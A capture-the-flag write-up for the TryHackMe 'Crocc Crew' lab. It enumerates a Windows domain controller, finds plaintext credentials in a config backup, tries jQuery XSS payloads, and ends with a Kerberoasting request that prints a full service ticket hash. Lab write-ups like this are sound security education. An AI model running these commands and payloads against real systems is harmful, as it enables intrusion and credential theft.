Crocc Crew
Recon to Foothold
Let’s being as always with a scan, first masscan
rob:TryHackMe/ $ sudo masscan -p1-65535,U:1-65535 10.10.45.72 --rate=1000 -e tun0
[sudo] password for rob:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-18 12:24:43 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.45.72
Discovered open port 593/tcp on 10.10.45.72
Discovered open port 9389/tcp on 10.10.45.72
Discovered open port 464/tcp on 10.10.45.72
Discovered open port 49678/tcp on 10.10.45.72
Discovered open port 49669/tcp on 10.10.45.72
Discovered open port 49675/tcp on 10.10.45.72
Discovered open port 49711/tcp on 10.10.45.72
Discovered open port 636/tcp on 10.10.45.72
Discovered open port 49666/tcp on 10.10.45.72
Discovered open port 389/tcp on 10.10.45.72
Discovered open port 53/tcp on 10.10.45.72
Discovered open port 49674/tcp on 10.10.45.72
Discovered open port 3269/tcp on 10.10.45.72
Discovered open port 80/tcp on 10.10.45.72
Discovered open port 135/tcp on 10.10.45.72
Discovered open port 139/tcp on 10.10.45.72
Discovered open port 88/tcp on 10.10.45.72
Discovered open port 53/udp on 10.10.45.72
Discovered open port 3268/tcp on 10.10.45.72
Discovered open port 3389/tcp on 10.10.45.72
Ok, given the number and type of ports discovered this looks like a Windows machine. No UDP ports discovered apart from DNS (53) so for now at least we can ignore that
And now nmap for detail
rob:TryHackMe/ $ nmap -A -T4 -v -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,9389 10.10.45.72
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 13:36 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating Ping Scan at 13:36
Scanning 10.10.45.72 [2 ports]
Completed Ping Scan at 13:36, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:36
Completed Parallel DNS resolution of 1 host. at 13:36, 0.04s elapsed
Initiating Connect Scan at 13:36
Scanning 10.10.45.72 [14 ports]
Discovered open port 135/tcp on 10.10.45.72
Discovered open port 80/tcp on 10.10.45.72
Discovered open port 139/tcp on 10.10.45.72
Discovered open port 53/tcp on 10.10.45.72
Discovered open port 3389/tcp on 10.10.45.72
Discovered open port 445/tcp on 10.10.45.72
Discovered open port 389/tcp on 10.10.45.72
Discovered open port 464/tcp on 10.10.45.72
Discovered open port 9389/tcp on 10.10.45.72
Discovered open port 3269/tcp on 10.10.45.72
Discovered open port 88/tcp on 10.10.45.72
Discovered open port 636/tcp on 10.10.45.72
Discovered open port 593/tcp on 10.10.45.72
Discovered open port 3268/tcp on 10.10.45.72
Completed Connect Scan at 13:36, 0.02s elapsed (14 total ports)
Initiating Service scan at 13:36
Scanning 14 services on 10.10.45.72
Completed Service scan at 13:36, 6.64s elapsed (14 services on 1 host)
NSE: Script scanning 10.10.45.72.
Initiating NSE at 13:36
Completed NSE at 13:36, 40.09s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.39s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Nmap scan report for 10.10.45.72
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-18 12:36:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COOCTUS.CORP0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COOCTUS.CORP0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: COOCTUS
| NetBIOS_Domain_Name: COOCTUS
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: COOCTUS.CORP
| DNS_Computer_Name: DC.COOCTUS.CORP
| Product_Version: 10.0.17763
|_ System_Time: 2021-08-18T12:36:20+00:00
| ssl-cert: Subject: commonName=DC.COOCTUS.CORP
| Issuer: commonName=DC.COOCTUS.CORP
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-06-07T02:37:18
| Not valid after: 2021-12-07T02:37:18
| MD5: 72be 3896 d880 1bc2 2455 1d55 33da 9300
|_SHA-1: bb1b c5bc 3aef ede9 3dc2 8b0d 0b00 c1d3 4371 19f4
|_ssl-date: 2021-08-18T12:37:00+00:00; +1s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-18T12:36:25
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.75 seconds
Before we dig into the website and more complex ports let’s have a look at some of the simpler stuff, starting with SMB
rob:TryHackMe/ $ smbclient -L 10.10.45.72 -U "" -N
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
Ok then, it looks like we’ll require some creds before that is of any potential use
From our nmap scan we found a domain name cooctus.corp, let’s see if we can query DNS
rob:TryHackMe/ $ dig any cooctus.corp @10.10.45.72
; <<>> DiG 9.16.15-Debian <<>> any cooctus.corp @10.10.45.72
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56434
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;cooctus.corp. IN ANY
;; ANSWER SECTION:
cooctus.corp. 600 IN A 10.10.10.237
cooctus.corp. 3600 IN NS dc.cooctus.corp.
cooctus.corp. 3600 IN SOA dc.cooctus.corp. hostmaster.cooctus.corp. 180 900 600 86400 3600
;; ADDITIONAL SECTION:
dc.cooctus.corp. 3600 IN A 10.10.45.72
;; Query time: 11 msec
;; SERVER: 10.10.45.72#53(10.10.45.72)
;; WHEN: Wed Aug 18 13:42:38 BST 2021
;; MSG SIZE rcvd: 137
Nothing particularly useful there, let’s try LDAP
rob:TryHackMe/ $ ldapsearch -x -h 10.10.45.72 -D '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
# extended LDIF
#
# LDAPv3
# base <DC=<1_SUBDOMAIN>,DC=<TDL>> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
No, this is looking for credentials too! Let’s try another way
rob:CroccCrew/ $ ldapsearch -LLL -x -H ldap://dc.cooctus.corp -b '' -s base '(objectclass=*)'
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=COOCTUS,DC=CORP
ldapServiceName: COOCTUS.CORP:dc$@COOCTUS.CORP
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
ion,DC=COOCTUS,DC=CORP
schemaNamingContext: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: DC=COOCTUS,DC=CORP
namingContexts: CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: DC=DomainDnsZones,DC=COOCTUS,DC=CORP
namingContexts: DC=ForestDnsZones,DC=COOCTUS,DC=CORP
isSynchronized: TRUE
highestCommittedUSN: 98342
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=COOCTUS,DC=CORP
dnsHostName: DC.COOCTUS.CORP
defaultNamingContext: DC=COOCTUS,DC=CORP
currentTime: 20210823235515.0Z
configurationNamingContext: CN=Configuration,DC=COOCTUS,DC=CORP
Ok, at a first glance there is nothing useful there for us. Some goolging though find us a new (to me at least) tool that looks very handy, ldapdomaindump
rob:CroccCrew/ $ ldapdomaindump -u 'Visitor' -p 'GuestLogin!' 10.10.145.144
[!] Username must include a domain, use: DOMAIN\username
rob:CroccCrew/ $ ldapdomaindump -u 'COOCTUS.CORP\Visitor' -p 'GuestLogin!' 10.10.145.144
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
This drops a number of files detailing computers, groups, policies, trusts, etc. An interesting one for us is the user table
There’s a lot of info here and nothing jumps out at me right now, it’s very readable though, must remember this one!
Trying to enumerate RPC gives us nothing without authentication either
rob:TryHackMe/ $ rpcinfo -p 10.10.45.72
10.10.45.72: RPC: Remote system error - Connection refused
And the same with rpcclient
rob:CroccCrew/ $ rpcclient -U "" -N dc.cooctus.corp
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
If we try hunting through the commands available we do find one that returns an output
rob:~/ $ rpcclient -U "" -N 10.10.245.246
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
So this would suggest that whatever service account is running the RPC service has interesting privileges like SEImpersonatePrivilege. If we can get in as this account we may be able to escalate our privileges from there. That’s a big IF though! 😄
Let’s check out the web server on port 80 next
Ok, looking at the source shows us that this is a page made on webflow.io, there’s nothing site specific here. Let’s see if we can enumerate the web server then with a directory buster
rob:~/ $ gobuster dir --url http://10.10.245.246 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php,asp,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.245.246
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php,asp,txt
[+] Timeout: 10s
===============================================================
2021/09/23 18:52:06 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 5342323]
/robots.txt (Status: 200) [Size: 70]
/Index.html (Status: 200) [Size: 5342323]
/backdoor.php (Status: 200) [Size: 529]
/Robots.txt (Status: 200) [Size: 70]
/index.html (Status: 200) [Size: 5342323]
===============================================================
2021/09/23 18:58:27 Finished
===============================================================
We found a robots.txt file that nmap didn’t show, let’s have a look at that
rob:CroccCrew/ $ curl dc.cooctus.corp/robots.txt
User-Agent: *
Disallow:
/robots.txt
/db-config.bak
/backdoor.php
Alright then, well there’s a couple of interesting files shown there, a backup of the database config perhaps and what could be a backdoor of some type, let’s look a little closer at these
rob:CroccCrew/ $ curl dc.cooctus.corp/db-config.bak
<?php
$servername = "db.cooctus.corp";
$username = "C00ctusAdm1n";
$password = "B4dt0th3b0n3";
// Create connection $conn = new mysqli($servername, $username, $password);
// Check connection if ($conn->connect_error) {
die ("Connection Failed: " .$conn->connect_error);
}
echo "Connected Successfully";
?>%
Excellent, we appear to have found some credentials, C00ctusAdm1n:B4dt0th3b0n3 to a mysql database. Even if we can’t access that from outside the box, we may find some credential reuse elsewhere. Speaking of which, we have an open RDP port, let’s see if it works there
And no, nothing doing. Let’s check the other file
rob:CroccCrew/ $ curl dc.cooctus.corp/backdoor.php
<!DOCTYPE html>
<html>
<head>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://unpkg.com/jquery.terminal/js/jquery.terminal.min.js"></script>
<link rel="stylesheet" href="https://unpkg.com/jquery.terminal/css/jquery.terminal.min.css"/>
</head>
<body>
</body>
</html>
<script>
$('body').terminal({
hello: function(what) {
this.echo('Hello, ' + what +
'. Wellcome to this terminal.');
}
}, {
greetings: 'CroccCrew >:)'
});
</script>
Well, that does indeed look like a potential way in, let’s check it out in a browser
It takes a little trial and error and looking at the curl output above, but we manage to get a response from this hello function. This appears to be taking arbitrary input from the user and returning it (possibly unsanitized) in the response
We can mess with this a bit to see if we get any interesting responses
> hello
[Arity] Wrong number of arguments. Function 'hello' expects 1 got 0!
> Hello hello
Command 'Hello' Not Found!
> hello hello\';echo('here's something fun')#
Error: JSON.parse: unterminated string at line 1 column 9 of the JSON data
Ok that’s interesting, we have a JSON parser here. Not sure what we can make of it though! 😄 …and that is apparently nothing
jQuery Terminal Emulator is a plugin for creating command line interpreters in your applications. It can automatically call JSON-RPC service when a user types commands or you can provide your own function in which you can parse user commands
Some checking of the downloaded javascript files shows
-
We are using jquery.terminal version 2.29.0 which was the very latest up until about 11 hours ago and has no known vulnerabilities according to the usual sources (cve.mitre.org, etc.)
-
But we are using
jquery-3.3.1.min.jswhich does have some known issues. This version was released 2018/1/20 (from the release history) and is a couple of major updates behind the current 3.6.0Most interesting for us though is the 3.5.0 release for which the release notes read
Despite being a minor release, this update includes a breaking change that we had to make to fix a security issue (
CVE-2020-11022)
If we check out this CVE we find something that sounds pretty useful in our situation
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery’s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code
Some googling finds that this CVE is one of a pair, we also have CVE-2020-11023
For CVE-2020-11022 we find a possible exploit in the exploit-db
And for CVE-2020-11023 we find some more
However when we try these we run into that argument number checker we saw earlier, the spaces are our enemies!
> hello <option><style></option></select><img src=x onerror=alert(1)></style>
[Arity] Wrong number of arguments. Function 'hello' expects 1 got 3!
And if we try to replace spaces with + or %20 we don’t get any further
> hello <option><style></option></select><img+src=x+onerror=alert(1)></style>
Hello, <option><style></option></select><img+src=x+onerror=alert(1)></style>. Wellcome to this terminal.
> hello <option><style></option></select><img%20src=x%20onerror=alert(1)></style>
Hello, <option><style></option></select><img%20src=x%20onerror=alert(1)></style>. Wellcome to this terminal.
But on a second thought, since those methods are typically good for URL encoding, perhaps we’d be better off trying to use
> hello <option><style></option></select><img src=x onerror=alert(1)></style>
^
However finishing this with a ; converts automagically back to a space!
> hello <option><style></option></select><img src=x onerror=alert(1)></style>
We seem to get a litle progress (maybe… at least a different response!) with escaping the spaces
hello > hello <option><style></option></select><img\ src=x\ onerror=alert(1)></style>
Hello, <option><style></option></select><img\ src=x onerror=alert(1)></style>. Wellcome to this terminal.
> hello <style><style\ /><img\ src=x\ onerror=alert(1)>
Hello, <style><style /><img src=x onerror=alert(1)>. Wellcome to this terminal.
> hello <img\ alt="<x"\ title="/><img\ src=x\ onerror=alert(1)>">
Error: JSON.parse: bad escaped character at line 1 column 7 of the JSON data
So we can see that in at least the first two POCs the string is being accepted, but it appears that it is not being interpreted, simply returned
Looking a little closer at the first (or second) output though we can see something odd
> hello <option><style></option></select><img\ src=x\ onerror=alert(1)></style>
Hello, <option><style></option></select><img\ src=x onerror=alert(1)></style>. Wellcome to this terminal.
For the space after src=x the backslash is gone and the space renders correctly. However for the space after img we can still see the backslash
At this point we’re grinding to a halt with this approach, let’s see if we can find another avenue of attack
On a hint from discord that remmina is not the best RDP client to use, let’s see what we get if we use an alternative, rdesktop
Ok, that does make a difference. Some googling suggests that
your RDP client must be old enough to not support network level authentication (i. e. from WinXP or before) or you have to connect via a
.rdpfile that contains the optionenablecredsspsupport:i:0
We’re not using a .rdp file, so I guess it is really old!
We find another possible set of user credentials we can try, Visitor:GuestLogin!, but they won’t work for RDP
Let’s try them elsewhere then
rob:~/ $ smbclient -L 10.10.245.246 -U 'Visitor'
Enter WORKGROUP\Visitor's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Home Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Excellent, we can access an SMB share with these credentials, let’s see what’s in there
rob:~/ $ smbclient //10.10.245.246/Home -U 'Visitor'
Enter WORKGROUP\Visitor's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jun 8 20:42:53 2021
.. D 0 Tue Jun 8 20:42:53 2021
user.txt A 17 Tue Jun 8 04:14:25 2021
15587583 blocks of size 4096. 11417631 blocks available
smb: \> get user.txt
getting file \user.txt of size 17 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> !cat user.txt
THM{REDACTED}
And we’ve got our first flag, #1: THM{REDACTED}
C00ctusAdm1n:B4dt0th3b0n3
NB: we could also have used
crackmapexecto test these credentials
rob:CroccCrew/ $ crackmapexec smb 10.10.145.144 -u ‘Visitor’ -p ‘GuestLogin!’ SMB 10.10.145.144 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:COOCTUS.CORP) (signing:True) (SMBv1:False) SMB 10.10.145.144 445 DC [+] COOCTUS.CORP\Visitor:GuestLogin!
From first creds to privileged RCE
So now, with a set of working SMB credentials, we have a few more options. We want to find usernames so let’s first try enum4linux
rob:~/ $ enum4linux -u 'Visitor' -p 'GuestLogin!' -U 10.10.245.246
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 23 19:18:14 2021
==========================
| Target Information |
==========================
Target ........... 10.10.245.246
RID Range ........ 500-550,1000-1050
Username ......... 'Visitor'
Password ......... 'GuestLogin!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.245.246 |
=====================================================
[E] Can't find workgroup/domain
======================================
| Session Check on 10.10.245.246 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.245.246 allows sessions using username 'Visitor', password 'GuestLogin!'
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
============================================
| Getting domain SID for 10.10.245.246 |
============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: COOCTUS
Domain Sid: S-1-5-21-2062199590-3607821280-2073525473
[+] Host is part of a domain (not a workgroup)
==============================
| Users on 10.10.245.246 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfda RID: 0x461 acb: 0x00000210 Account: admCroccCrew Name: admCroccCrew Desc: (null)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfe4 RID: 0x46b acb: 0x00000210 Account: Ben Name: Ben Desc: (null)
index: 0xfdd RID: 0x464 acb: 0x00000210 Account: cryillic Name: cryillic Desc: (null)
index: 0xfe5 RID: 0x46c acb: 0x00000210 Account: David Name: David Desc: (null)
index: 0xfe3 RID: 0x46a acb: 0x00000210 Account: evan Name: evan Desc: (null)
index: 0xfdb RID: 0x462 acb: 0x00000210 Account: Fawaz Name: Fawaz Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfd9 RID: 0x460 acb: 0x00000210 Account: Howard Name: Howard Desc: (null)
index: 0xfd5 RID: 0x45c acb: 0x00000210 Account: Jeff Name: Jeff Desc: (null)
index: 0xfe1 RID: 0x468 acb: 0x00000210 Account: jon Name: jon Desc: (null)
index: 0xfdc RID: 0x463 acb: 0x00000210 Account: karen Name: karen Desc: (null)
index: 0xfe0 RID: 0x467 acb: 0x00000210 Account: kevin Name: kevin Desc: (null)
index: 0xf0f RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfd4 RID: 0x45b acb: 0x00020010 Account: mark Name: Mark Desc: (null)
index: 0xfdf RID: 0x466 acb: 0x00000210 Account: pars Name: paradox Desc: (null)
index: 0xfe8 RID: 0x46e acb: 0x00040210 Account: password-reset Name: reset Desc: (null)
index: 0xfd6 RID: 0x45d acb: 0x00000210 Account: Spooks Name: Spooks Desc: (null)
index: 0xfd8 RID: 0x45f acb: 0x00000210 Account: Steve Name: Steve Desc: (null)
index: 0xfe2 RID: 0x469 acb: 0x00000210 Account: Varg Name: varg Desc: (null)
index: 0xfb8 RID: 0x455 acb: 0x00000210 Account: Visitor Name: Cooctus Guest Desc: (null)
index: 0xfde RID: 0x465 acb: 0x00000210 Account: yumeko Name: yumeko Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Visitor] rid:[0x455]
user:[mark] rid:[0x45b]
user:[Jeff] rid:[0x45c]
user:[Spooks] rid:[0x45d]
user:[Steve] rid:[0x45f]
user:[Howard] rid:[0x460]
user:[admCroccCrew] rid:[0x461]
user:[Fawaz] rid:[0x462]
user:[karen] rid:[0x463]
user:[cryillic] rid:[0x464]
user:[yumeko] rid:[0x465]
user:[pars] rid:[0x466]
user:[kevin] rid:[0x467]
user:[jon] rid:[0x468]
user:[Varg] rid:[0x469]
user:[evan] rid:[0x46a]
user:[Ben] rid:[0x46b]
user:[David] rid:[0x46c]
user:[password-reset] rid:[0x46e]
enum4linux complete on Thu Sep 23 19:18:25 2021
Of these found usernames the one most likely to be the planted account must be #2: admCroccCrew
We can try psexec by impacket to see can we get a shell from here
rob:CroccCrew/ $ impacket-psexec 'COOCTUS.CORP/Visitor:GuestLogin!'@10.10.145.144 -dc-ip 10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.145.144.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'Home' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
Unfortunately we do not have a writable share that can be used, so no joy!
Sticking with the impacket tools though, can we do more with this? Let’s try GetUserSPNs to see can we find a service account to abuse
rob:CroccCrew/ $ impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.10.145.144 -request -outputfile TGS.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------------- -------- -------------------------- -------------------------- -----------
HTTP/dc.cooctus.corp password-reset 2021-06-08 23:00:39.356663 2021-06-08 22:46:23.369540 constrained
And we retrieved a hash too
rob:CroccCrew/ $ cat TGS.txt
$krb5tgs$23$*password-reset$COOCTUS.CORP$COOCTUS.CORP/password-reset*$4024001208a3bc13b06e873d2dac6a8f$86f409e6dab77f5c154ece6cb178804c7b10a6714c5845da94672d6e904d12bcc1584e101093546605253747facb2b21b335871415882868eeb18cd25f0132bad532c8f84ab9c934ef2fb52131ac71eac6d6198ee509f931e76424d76c3b23c55a9a7e7a8831e29f62789d84c40df2729897bfbf27f1b14ff0cbcf47c44506bf2132ebf988d4b0e0c0f75b72b3616bd3e3db9c4adacb3deabb35da2ca32565fc1a4e353bb195cbaa078e6ad0cc838e143a8ff300042c6270aa473e7b329973f39de7de7ea250f11daff2afcba77a2ef1a43499506f4a035d9edb985233d711738a852efa9bac6c589beca775923905e122e1b1fc9e4650316c376a43abc6a8197ca3abaf13cd95b5a0e420b1caf4ca30021145127c44ae4c1e352b505076e2e9a531ef761c5119de16983239a60f57b3f843e9b1869a9c892c6536ae6de07ee032002ba46a458b3dae5db5c6d1fe7af2bbdbb943ed87d7972b51b2452604e4bbf7d2abddab72a650b973a99e9f6db56d8540234bf1923976223b1997dffe4f3711e8267ca71989a01686a0134bdfb379d52b3ec3cfad48cdebc96085d4133a1dd3f85b7f01976e4542d2aeb22a21927fcbc6af7df22bab540cc8c4fa41389624334e7ad6f98a14dff4f53430b63beae9660ee9ec5a2856